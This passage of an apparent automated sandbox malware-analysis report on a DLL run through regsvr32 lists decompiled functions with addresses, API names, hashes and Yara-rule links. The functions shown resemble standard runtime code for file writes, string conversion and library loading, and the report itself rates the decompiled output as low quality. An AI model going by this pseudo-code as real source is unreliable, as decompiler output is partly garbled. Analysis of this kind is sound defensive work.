				_v120 = _v120 & 0;
				r8d = r15d;
				_v100 = 0;
				WriteFile(??, ??, ??, ??, ??);
				if (0 != 0) goto 0x130f4d3b;
				GetLastError();
				_v104 = 0;
				asm("movsd xmm0, [ebp-0x30]");
				asm("movsd [ebp-0x20], xmm0");
				if (_v88 >> 0x20 != 0) goto 0x130f4dbc;
				_t152 = _v88;
				if (_t152 == 0) goto 0x130f4d88;
				if (_t152 != 5) goto 0x130f4d7b;
				E00007FFC7FFC130EE6A0(_t152);
				 *_t152 = 9;
				E00007FFC7FFC130EE680(_t152);
				 *_t152 = 5;
				goto 0x130f4b42;
				E00007FFC7FFC130EE630(r13d, _t152, 3);
				goto 0x130f4b42;
				_t154 =  *((intOrPtr*)(0x13124970 + _t198 * 8));
				if (( *(0x13124970 + _t200 + 0x38) & 0x00000040) == 0) goto 0x130f4da4;
				if ( *_t183 == 0x1a) goto 0x130f4b1f;
				E00007FFC7FFC130EE6A0(_t154);
				 *0x13124970 = 0x1c;
				_t94 = E00007FFC7FFC130EE680(_t154);
				 *_t154 =  *_t154 & 0x00000000;
				goto 0x130f4b42;
				return _t94;
			}


































                                0x7ffc130f4af8
                                0x7ffc130f4af8
                                0x7ffc130f4af8
                                0x7ffc130f4b11
                                0x7ffc130f4b14
                                0x7ffc130f4b17
                                0x7ffc130f4b1d
                                0x7ffc130f4b21
                                0x7ffc130f4b29
                                0x7ffc130f4b2b
                                0x7ffc130f4b30
                                0x7ffc130f4b32
                                0x7ffc130f4b37
                                0x7ffc130f4b3d
                                0x7ffc130f4b45
                                0x7ffc130f4b54
                                0x7ffc130f4b5b
                                0x7ffc130f4b5f
                                0x7ffc130f4b63
                                0x7ffc130f4b67
                                0x7ffc130f4b6b
                                0x7ffc130f4b75
                                0x7ffc130f4b7a
                                0x7ffc130f4b7e
                                0x7ffc130f4b86
                                0x7ffc130f4b8d
                                0x7ffc130f4b91
                                0x7ffc130f4b99
                                0x7ffc130f4b9d
                                0x7ffc130f4ba4
                                0x7ffc130f4bb1
                                0x7ffc130f4bbb
                                0x7ffc130f4bc1
                                0x7ffc130f4bd4
                                0x7ffc130f4be6
                                0x7ffc130f4c00
                                0x7ffc130f4c08
                                0x7ffc130f4c10
                                0x7ffc130f4c12
                                0x7ffc130f4c17
                                0x7ffc130f4c1d
                                0x7ffc130f4c20
                                0x7ffc130f4c26
                                0x7ffc130f4c29
                                0x7ffc130f4c2f
                                0x7ffc130f4c35
                                0x7ffc130f4c46
                                0x7ffc130f4c4b
                                0x7ffc130f4c53
                                0x7ffc130f4c55
                                0x7ffc130f4c67
                                0x7ffc130f4c6b
                                0x7ffc130f4c77
                                0x7ffc130f4c79
                                0x7ffc130f4c7b
                                0x7ffc130f4c81
                                0x7ffc130f4c84
                                0x7ffc130f4c88
                                0x7ffc130f4c8d
                                0x7ffc130f4c9a
                                0x7ffc130f4c9f
                                0x7ffc130f4ca6
                                0x7ffc130f4cbc
                                0x7ffc130f4cc1
                                0x7ffc130f4cc3
                                0x7ffc130f4cc8
                                0x7ffc130f4ccd
                                0x7ffc130f4ccf
                                0x7ffc130f4cdc
                                0x7ffc130f4ce1
                                0x7ffc130f4ce3
                                0x7ffc130f4cf0
                                0x7ffc130f4cf5
                                0x7ffc130f4cf7
                                0x7ffc130f4d04
                                0x7ffc130f4d09
                                0x7ffc130f4d14
                                0x7ffc130f4d19
                                0x7ffc130f4d1e
                                0x7ffc130f4d24
                                0x7ffc130f4d28
                                0x7ffc130f4d30
                                0x7ffc130f4d32
                                0x7ffc130f4d38
                                0x7ffc130f4d3e
                                0x7ffc130f4d43
                                0x7ffc130f4d52
                                0x7ffc130f4d54
                                0x7ffc130f4d59
                                0x7ffc130f4d5e
                                0x7ffc130f4d60
                                0x7ffc130f4d65
                                0x7ffc130f4d6b
                                0x7ffc130f4d70
                                0x7ffc130f4d76
                                0x7ffc130f4d7e
                                0x7ffc130f4d83
                                0x7ffc130f4d8f
                                0x7ffc130f4d99
                                0x7ffc130f4d9e
                                0x7ffc130f4da4
                                0x7ffc130f4da9
                                0x7ffc130f4daf
                                0x7ffc130f4db4
                                0x7ffc130f4db7
                                0x7ffc130f4dd8

                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.641844385.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000003.00000002.641834581.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641880022.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641907930.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641915677.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641932303.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641940757.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7ffc130e0000_regsvr32.jbxd
                                Similarity
                                • API ID: _invalid_parameter_noinfo
                                • String ID:
                                • API String ID: 3215553584-0
                                • Opcode ID: 1c690db1309c7a900eb2931eff8c1d9e19a22f9b812b3326b35846991b02b16e
                                • Instruction ID: 8198741ddaf4f9c2ed38ab7a1c700d2cf715dc8ed07617c4b25deb922127e75a
                                • Opcode Fuzzy Hash: 1c690db1309c7a900eb2931eff8c1d9e19a22f9b812b3326b35846991b02b16e
                                • Instruction Fuzzy Hash: A481BF22B18E2A86FB509F6599406BD26E8BF44BACF424175CE0E337D5DF3CA461C720
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130F446C Relevance: 7.6, APIs: 5, Instructions: 142fileCOMMON
                                Download Yara Rule
                                C-Code - Quality: 20%
                                			E00007FFC7FFC130F446C(signed int __edx, void* __edi, void* __esi, long long __rbx, long long* __rcx, void* __rdx, long long __r8, void* __r9, long long _a8) {
				signed long long _v72;
				char _v80;
				intOrPtr _v87;
				char _v88;
				long long _v96;
				long long _v104;
				long long _v108;
				long long _v112;
				int _v116;
				char _v120;
				signed long long _v128;
				signed long long _v136;
				long long _v144;
				signed int _v152;
				int _t76;
				int _t77;
				long _t80;
				signed char _t81;
				signed int _t87;
				signed long long _t99;
				intOrPtr _t103;
				signed int _t104;
				long long _t106;
				long long* _t109;
				intOrPtr _t126;
				void* _t137;
				intOrPtr* _t138;
				signed long long _t141;
				void* _t143;
				void* _t151;
				void* _t152;
				signed long long _t156;

				_a8 = __rbx;
				_t99 =  *0x13123760; // 0xe67021d0ea18
				_v72 = _t99 ^ _t143 - 0x00000080;
				r12d = r9d;
				_t156 = __edx >> 6;
				_t141 = (__edx & 0x0000003f) << 6;
				_v96 = __r8;
				_t109 = __rcx;
				_t152 = _t151 + __r8;
				_t103 =  *((intOrPtr*)( *((intOrPtr*)(0x13124970 + _t156 * 8)) + _t141 + 0x28));
				_v104 = 0x13124970;
				GetConsoleCP();
				_v108 = 0x13124970;
				 *__rcx = 0;
				 *((long long*)(__rcx + 8)) = 0;
				if (__r8 - _t152 >= 0) goto 0x130f464a;
				r13b =  *((intOrPtr*)(__r8));
				_v120 = __edx;
				_t126 =  *((intOrPtr*)(0x13124970 + _t156 * 8));
				_t81 =  *(_t126 + _t141 + 0x3d);
				_t87 = _t81 & 0x00000004;
				if (_t87 == 0) goto 0x130f451f;
				 *(_t126 + _t141 + 0x3d) = _t81 & 0x000000fb;
				r8d = 2;
				_v88 =  *((intOrPtr*)(_t126 + _t141 + 0x3e));
				_v87 = r13b;
				goto 0x130f4564;
				E00007FFC7FFC130F1740(_t81 & 0x000000fb, __edx, _t103, __rcx, __rcx,  &_v88, __r9);
				if (_t87 == 0) goto 0x130f455b;
				if (__r8 - _t152 >= 0) goto 0x130f462a;
				r8d = 2;
				E00007FFC7FFC130F1654( &_v120, __r8);
				if (_t103 == 0xffffffff) goto 0x130f464a;
				_t137 = __r8 + 1;
				goto 0x130f4576;
				r8d = 1;
				E00007FFC7FFC130F1654( &_v120, _t137);
				if (_t103 == 0xffffffff) goto 0x130f464a;
				_v128 = _v128 & 0x00000000;
				_t104 =  &_v80;
				_v136 = _v136 & 0x00000000;
				r9d = 1;
				_v144 = 5;
				_v152 = _t104;
				_t138 = _t137 + 1;
				_t76 = WideCharToMultiByte(??, ??, ??, ??, ??, ??, ??, ??);
				r14d = _t76;
				if (_t104 == 0) goto 0x130f464a;
				_v152 = _v152 & 0x00000000;
				r8d = _t76;
				_t77 = WriteFile(??, ??, ??, ??, ??);
				if (_t104 == 0) goto 0x130f4642;
				 *((long long*)(_t109 + 4)) =  *((intOrPtr*)(_t109 + 8)) - _v96 + _t138;
				if (_v112 - r14d < 0) goto 0x130f464a;
				if (r13b != 0xa) goto 0x130f4622;
				_v152 = 0;
				r8d = 1;
				_v116 = _t77;
				WriteFile(??, ??, ??, ??, ??);
				if (0xd == 0) goto 0x130f4642;
				if (_v112 - 1 < 0) goto 0x130f464a;
				 *((long long*)(_t109 + 8)) =  *((long long*)(_t109 + 8)) + 1;
				 *((long long*)(_t109 + 4)) =  *((long long*)(_t109 + 4)) + 1;
				goto 0x130f44e0;
				 *((char*)( *((intOrPtr*)(0x13124970 + _t156 * 8)) + _t141 + 0x3e)) =  *_t138;
				_t106 =  *((intOrPtr*)(0x13124970 + _t156 * 8));
				 *(_t106 + _t141 + 0x3d) =  *(_t106 + _t141 + 0x3d) | 0x00000004;
				 *((long long*)(_t109 + 4)) =  *((long long*)(_t109 + 4)) + 1;
				goto 0x130f464a;
				_t80 = GetLastError();
				 *_t109 = _t106;
				E00007FFC7FFC130F6D80();
				return _t80;
			}



































                                0x7ffc130f446c
                                0x7ffc130f4486
                                0x7ffc130f4490
                                0x7ffc130f44a1
                                0x7ffc130f44a4
                                0x7ffc130f44ab
                                0x7ffc130f44b2
                                0x7ffc130f44b6
                                0x7ffc130f44b9
                                0x7ffc130f44c0
                                0x7ffc130f44c5
                                0x7ffc130f44c9
                                0x7ffc130f44d1
                                0x7ffc130f44d4
                                0x7ffc130f44da
                                0x7ffc130f44e0
                                0x7ffc130f44e6
                                0x7ffc130f44f0
                                0x7ffc130f44f4
                                0x7ffc130f44f8
                                0x7ffc130f44fc
                                0x7ffc130f44ff
                                0x7ffc130f4508
                                0x7ffc130f450c
                                0x7ffc130f4516
                                0x7ffc130f4519
                                0x7ffc130f451d
                                0x7ffc130f451f
                                0x7ffc130f4530
                                0x7ffc130f4535
                                0x7ffc130f453b
                                0x7ffc130f4548
                                0x7ffc130f4550
                                0x7ffc130f4556
                                0x7ffc130f4559
                                0x7ffc130f455b
                                0x7ffc130f4568
                                0x7ffc130f4570
                                0x7ffc130f4576
                                0x7ffc130f457c
                                0x7ffc130f4580
                                0x7ffc130f458d
                                0x7ffc130f4593
                                0x7ffc130f459d
                                0x7ffc130f45a2
                                0x7ffc130f45a5
                                0x7ffc130f45ab
                                0x7ffc130f45b0
                                0x7ffc130f45be
                                0x7ffc130f45c8
                                0x7ffc130f45cb
                                0x7ffc130f45d5
                                0x7ffc130f45df
                                0x7ffc130f45e6
                                0x7ffc130f45ec
                                0x7ffc130f45f5
                                0x7ffc130f45fa
                                0x7ffc130f4602
                                0x7ffc130f460a
                                0x7ffc130f4614
                                0x7ffc130f461a
                                0x7ffc130f461c
                                0x7ffc130f461f
                                0x7ffc130f4625
                                0x7ffc130f4630
                                0x7ffc130f4634
                                0x7ffc130f4638
                                0x7ffc130f463d
                                0x7ffc130f4640
                                0x7ffc130f4642
                                0x7ffc130f4648
                                0x7ffc130f4654
                                0x7ffc130f4673

                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.641844385.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000003.00000002.641834581.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641880022.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641907930.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641915677.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641932303.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641940757.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7ffc130e0000_regsvr32.jbxd
                                Similarity
                                • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                • String ID:
                                • API String ID: 3659116390-0
                                • Opcode ID: d55e4a3dc7fda081f8c103fa79b76e6ac1113be7caa21f5244fb0ba4ff43a9cd
                                • Instruction ID: 9de9824038147a5cd8e5a518f35adca10164798dc89546b3ec1ab7c393af6ecd
                                • Opcode Fuzzy Hash: d55e4a3dc7fda081f8c103fa79b76e6ac1113be7caa21f5244fb0ba4ff43a9cd
                                • Instruction Fuzzy Hash: 7B51D232A18A658AFB10CF25E9443AD37B4FB48BACF148135CE0A67798DF38D165C710
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130EF320 Relevance: 7.6, APIs: 5, Instructions: 114libraryloaderCOMMONLIBRARYCODE
                                Download Yara Rule
                                C-Code - Quality: 34%
                                			E00007FFC7FFC130EF320(void* __ecx, long long __rbx, void* __rdx, long long __rsi, intOrPtr* __r8, void* __r9) {
				signed long long _t61;
				signed long long _t65;
				intOrPtr _t68;
				signed long long _t82;
				struct HINSTANCE__* _t91;
				signed long long _t92;
				signed long long _t97;
				long long _t99;
				void* _t103;
				signed long long _t107;
				signed long long _t109;
				signed long long _t112;
				struct HINSTANCE__* _t113;
				long _t116;
				void* _t119;
				WCHAR* _t121;

				 *((long long*)(_t103 + 8)) = __rbx;
				 *((long long*)(_t103 + 0x10)) = _t99;
				 *((long long*)(_t103 + 0x18)) = __rsi;
				r14d = __ecx;
				_t109 =  *0x13123760; // 0xe67021d0ea18
				_t92 = _t91 | 0xffffffff;
				_t82 = _t109 ^  *(0x7ffc130e0000 + 0x44810 + _t119 * 8);
				asm("dec eax");
				if (_t82 == _t92) goto 0x130ef4a1;
				if (_t82 == 0) goto 0x130ef389;
				_t61 = _t82;
				goto 0x130ef4a3;
				if (__r8 == __r9) goto 0x130ef435;
				_t97 =  *((intOrPtr*)(__r8));
				_t68 =  *((intOrPtr*)(0x7ffc130e0000 + 0x44770 + _t97 * 8));
				if (_t68 == 0) goto 0x130ef3a9;
				if (_t68 == _t92) goto 0x130ef421;
				goto 0x130ef41c;
				r8d = 0x800;
				LoadLibraryExW(_t121, _t119, _t116);
				if (_t61 != 0) goto 0x130ef3ea;
				GetLastError();
				if (_t61 != 0x57) goto 0x130ef3e8;
				r8d = 0;
				LoadLibraryExW(??, ??, ??);
				goto 0x130ef3ea;
				if (0 != 0) goto 0x130ef403;
				 *((intOrPtr*)(0x7ffc130e0000 + 0x44770 + _t97 * 8)) = _t92;
				goto 0x130ef421;
				_t19 = 0x7ffc130e0000 + 0x44770 + _t97 * 8;
				_t65 =  *_t19;
				 *_t19 = 0;
				if (_t65 == 0) goto 0x130ef41c;
				FreeLibrary(_t113);
				if (0 != 0) goto 0x130ef476;
				if (__r8 + 4 != __r9) goto 0x130ef392;
				if (0 == 0) goto 0x130ef486;
				GetProcAddress(_t91);
				if (_t65 == 0) goto 0x130ef47f;
				_t107 =  *0x13123760; // 0xe67021d0ea18
				asm("loope 0x41");
				asm("dec eax");
				 *(0x7ffc130e0000 + 0x44810 + _t119 * 8) = _t65 ^ _t107;
				goto 0x130ef4a3;
				goto 0x130ef437;
				_t112 =  *0x13123760; // 0xe67021d0ea18
				asm("enter 0xd348, 0xcf");
				 *(0x7ffc130e0000 + 0x44810 + _t119 * 8) = _t92 ^ _t112;
				return r10d;
			}



















                                0x7ffc130ef320
                                0x7ffc130ef325
                                0x7ffc130ef32a
                                0x7ffc130ef33c
                                0x7ffc130ef357
                                0x7ffc130ef35e
                                0x7ffc130ef368
                                0x7ffc130ef370
                                0x7ffc130ef376
                                0x7ffc130ef37f
                                0x7ffc130ef381
                                0x7ffc130ef384
                                0x7ffc130ef38c
                                0x7ffc130ef392
                                0x7ffc130ef395
                                0x7ffc130ef3a0
                                0x7ffc130ef3a5
                                0x7ffc130ef3a7
                                0x7ffc130ef3b6
                                0x7ffc130ef3bc
                                0x7ffc130ef3c8
                                0x7ffc130ef3ca
                                0x7ffc130ef3d3
                                0x7ffc130ef3d5
                                0x7ffc130ef3dd
                                0x7ffc130ef3e6
                                0x7ffc130ef3f4
                                0x7ffc130ef3f9
                                0x7ffc130ef401
                                0x7ffc130ef406
                                0x7ffc130ef406
                                0x7ffc130ef406
                                0x7ffc130ef411
                                0x7ffc130ef416
                                0x7ffc130ef41f
                                0x7ffc130ef428
                                0x7ffc130ef43a
                                0x7ffc130ef442
                                0x7ffc130ef44b
                                0x7ffc130ef44d
                                0x7ffc130ef45d
                                0x7ffc130ef466
                                0x7ffc130ef46c
                                0x7ffc130ef474
                                0x7ffc130ef47d
                                0x7ffc130ef47f
                                0x7ffc130ef492
                                0x7ffc130ef499
                                0x7ffc130ef4bf

                                APIs
                                • GetProcAddress.KERNEL32(?,0000E67021D0EA18,00000007,00007FFC130EF647,?,?,00000000,00007FFC130EF1C7,?,?,0000E67021D0EA18,00007FFC130EE6A9), ref: 00007FFC130EF442
                                Memory Dump Source
                                • Source File: 00000003.00000002.641844385.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000003.00000002.641834581.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641880022.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641907930.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641915677.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641932303.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641940757.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7ffc130e0000_regsvr32.jbxd
                                Similarity
                                • API ID: AddressProc
                                • String ID:
                                • API String ID: 190572456-0
                                • Opcode ID: 455019633da336f5729206dc12b9164558a1ea73cc9de17300a2dc75095f9908
                                • Instruction ID: b3c1aa9b45117998430089d8621a0ccc55ad2349ced2e3cb28d30a168b23aa20
                                • Opcode Fuzzy Hash: 455019633da336f5729206dc12b9164558a1ea73cc9de17300a2dc75095f9908
                                • Instruction Fuzzy Hash: CE4128A2B0EE6981FE118B52A80027523D1BF04BF8F1A4939DD1D5B7C4EF3CE015C214
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130F4EEC Relevance: 7.6, APIs: 5, Instructions: 72COMMON
                                Download Yara Rule
                                C-Code - Quality: 23%
                                			E00007FFC7FFC130F4EEC(void* __edx, long long* __rax, long long __rbx, void* __rcx, long long* __rdx, long long __rsi, long long __rbp, long long _a8, long long _a16, long long _a24) {
				long long _v32;
				long long _v40;
				void* _t12;
				int _t14;
				void* _t20;
				void* _t24;

				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				if (__rcx != 0) goto 0x130f4f28;
				_t12 = E00007FFC7FFC130EE6A0(__rax);
				 *__rax = 0x16;
				E00007FFC7FFC130EE580(_t12);
				goto 0x130f4fc9;
				if (__rdx == 0) goto 0x130f4f11;
				E00007FFC7FFC130EF4C0();
				_v32 = 0;
				r15d = _t24;
				 *__rdx = 0;
				r15b = 0 == 0;
				_v40 = 0;
				r9d = r9d | 0xffffffff;
				_t14 = MultiByteToWideChar(??, ??, ??, ??, ??, ??);
				if (0 != 0) goto 0x130f4f6f;
				GetLastError();
				E00007FFC7FFC130EE630(r15d, 0, __rbx);
				goto 0x130f4f21;
				E00007FFC7FFC130EE154(0, _t14 + _t14);
				if (0 == 0) goto 0x130f4fbf;
				_v32 = r14d;
				r9d = r9d | 0xffffffff;
				_v40 = 0;
				MultiByteToWideChar(??, ??, ??, ??, ??, ??);
				if (0 != 0) goto 0x130f4fb1;
				GetLastError();
				_t20 = E00007FFC7FFC130EE630(r15d, 0, 0);
				goto 0x130f4fbf;
				 *__rdx = 0;
				asm("invalid");
				return _t20;
			}









                                0x7ffc130f4eec
                                0x7ffc130f4ef1
                                0x7ffc130f4ef6
                                0x7ffc130f4f0f
                                0x7ffc130f4f11
                                0x7ffc130f4f16
                                0x7ffc130f4f1c
                                0x7ffc130f4f23
                                0x7ffc130f4f2b
                                0x7ffc130f4f2d
                                0x7ffc130f4f34
                                0x7ffc130f4f38
                                0x7ffc130f4f3b
                                0x7ffc130f4f3e
                                0x7ffc130f4f42
                                0x7ffc130f4f4a
                                0x7ffc130f4f53
                                0x7ffc130f4f5e
                                0x7ffc130f4f60
                                0x7ffc130f4f68
                                0x7ffc130f4f6d
                                0x7ffc130f4f75
                                0x7ffc130f4f80
                                0x7ffc130f4f82
                                0x7ffc130f4f87
                                0x7ffc130f4f8e
                                0x7ffc130f4f98
                                0x7ffc130f4fa0
                                0x7ffc130f4fa2
                                0x7ffc130f4faa
                                0x7ffc130f4faf
                                0x7ffc130f4fb7
                                0x7ffc130f4fc5
                                0x7ffc130f4fe1

                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.641844385.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000003.00000002.641834581.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641880022.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641907930.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641915677.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641932303.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641940757.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7ffc130e0000_regsvr32.jbxd
                                Similarity
                                • API ID: ByteCharErrorLastMultiWide$AllocHeap_invalid_parameter_noinfo
                                • String ID:
                                • API String ID: 2395940807-0
                                • Opcode ID: 35dbe73a7bb461abc9f03f03902340b94bb8d2f0b9dbf59d0741637dfc6f8abb
                                • Instruction ID: bead81b311d4956a53ee90830fa4c9ec142b17a700b8c3690d425cc51ce643dc
                                • Opcode Fuzzy Hash: 35dbe73a7bb461abc9f03f03902340b94bb8d2f0b9dbf59d0741637dfc6f8abb
                                • Instruction Fuzzy Hash: 5121B531B08F6A42FA149F66AD0013AA2D9AFC4BB8F150934ED5D637D5EE3CD464C220
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130F6400 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                Download Yara Rule
                                C-Code - Quality: 71%
                                			E00007FFC7FFC130F6400(signed int __ecx, void* __edx, long long __rbx, void* __rdx, long long __rsi, long long _a8, long long _a16) {
				void* _t24;
				signed char _t25;
				signed int _t30;
				signed int _t31;
				signed int _t32;
				signed long long _t39;
				signed long long _t40;
				signed int* _t48;

				_a8 = __rbx;
				_a16 = __rsi;
				_t39 = _t40 & 0x0000001f;
				_t48 = _t40;
				if ((__ecx & 0x00000008) == 0) goto 0x130f6431;
				if (__edx >= 0) goto 0x130f6431;
				 *((intOrPtr*)(_t39 + 0x57ebf7e3)) =  *((intOrPtr*)(_t39 + 0x57ebf7e3)) + _t24;
				asm("adc [eax+0xf], ecx");
				 *((intOrPtr*)(_t39 + 0x3cebfbe3)) =  *((intOrPtr*)(_t39 + 0x3cebfbe3)) + _t24;
				_t30 = dil & 0x00000001;
				if (_t30 == 0) goto 0x130f6468;
				asm("dec eax");
				if (_t30 >= 0) goto 0x130f6468;
				 *((intOrPtr*)(_t39 + 0x20ebfee3)) =  *((intOrPtr*)(_t39 + 0x20ebfee3)) + _t24;
				_t31 = dil & 0x00000002;
				if (_t31 == 0) goto 0x130f6488;
				asm("dec eax");
				if (_t31 >= 0) goto 0x130f6488;
				_t32 = dil & 0x00000010;
				if (_t32 == 0) goto 0x130f6485;
				 *((intOrPtr*)(_t39 - 0x9bf021d)) =  *((intOrPtr*)(_t39 - 0x9bf021d)) + _t24;
				asm("invalid");
				if (_t32 == 0) goto 0x130f64a2;
				asm("dec eax");
				if (_t32 >= 0) goto 0x130f64a2;
				 *((intOrPtr*)(_t39 - 0x74b7101d)) =  *((intOrPtr*)(_t39 - 0x74b7101d)) + _t24;
				if (_t32 == 0) goto 0x130f64ca;
				asm("rol byte [ebp+0x5c8b48db], 0x24");
				 *_t48 =  *_t48 ^ __ecx;
				asm("ror byte [eax-0x7d], 0xc4");
				 *(_t48 - 0x3d) =  *(_t48 - 0x3d) & _t25;
			}











                                0x7ffc130f6400
                                0x7ffc130f6405
                                0x7ffc130f6414
                                0x7ffc130f6417
                                0x7ffc130f641c
                                0x7ffc130f6420
                                0x7ffc130f642b
                                0x7ffc130f643a
                                0x7ffc130f6446
                                0x7ffc130f644c
                                0x7ffc130f6450
                                0x7ffc130f6452
                                0x7ffc130f6457
                                0x7ffc130f6462
                                0x7ffc130f6468
                                0x7ffc130f646c
                                0x7ffc130f646e
                                0x7ffc130f6473
                                0x7ffc130f6475
                                0x7ffc130f6479
                                0x7ffc130f6484
                                0x7ffc130f648a
                                0x7ffc130f648c
                                0x7ffc130f648e
                                0x7ffc130f6493
                                0x7ffc130f649e
                                0x7ffc130f64a4
                                0x7ffc130f64a8
                                0x7ffc130f64af
                                0x7ffc130f64b2
                                0x7ffc130f64b6

                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.641844385.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000003.00000002.641834581.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641880022.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641907930.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641915677.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641932303.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641940757.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7ffc130e0000_regsvr32.jbxd
                                Similarity
                                • API ID: _set_statfp
                                • String ID:
                                • API String ID: 1156100317-0
                                • Opcode ID: 8e204902ee3cdeb9f77a3f964fa6f85e84bca92309d804b1f408b313ac172a76
                                • Instruction ID: 964fa575040371325d65a34880e014d11f59a0afc52581298c705295d34a18fa
                                • Opcode Fuzzy Hash: 8e204902ee3cdeb9f77a3f964fa6f85e84bca92309d804b1f408b313ac172a76
                                • Instruction Fuzzy Hash: 8F11C426E18E3F0BF6542134DF4637911D96F453BCE080AB4E96E27AD6CE2D7461D231
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130F4898 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100fileCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.641844385.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000003.00000002.641834581.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641880022.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641907930.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641915677.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641932303.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641940757.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7ffc130e0000_regsvr32.jbxd
                                Similarity
                                • API ID: ByteCharErrorFileLastMultiWideWrite
                                • String ID: U
                                • API String ID: 2456169464-4171548499
                                • Opcode ID: a2d3cb67cfcf3dc513eb76f03ce482a2aef41a2ff1dbddf9374cbcdbadebe864
                                • Instruction ID: c6116eb31599becb4ad0f909fe8d585fdfe02209de7472e901fd323701e8414b
                                • Opcode Fuzzy Hash: a2d3cb67cfcf3dc513eb76f03ce482a2aef41a2ff1dbddf9374cbcdbadebe864
                                • Instruction Fuzzy Hash: E941F622B1CA5982EB20CF25E8043BA77A4FB887A8F414031EE8DA7788DF3CD511C750
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130F20A8 Relevance: 6.2, APIs: 4, Instructions: 160COMMON
                                Download Yara Rule
                                C-Code - Quality: 75%
                                			E00007FFC7FFC130F20A8(void* __edx, void* __eflags, long long* __rax, long long __rbx, signed int* __rcx, long long __rbp, long long _a8, char _a16, long long _a24) {
				void* _t35;
				void* _t36;
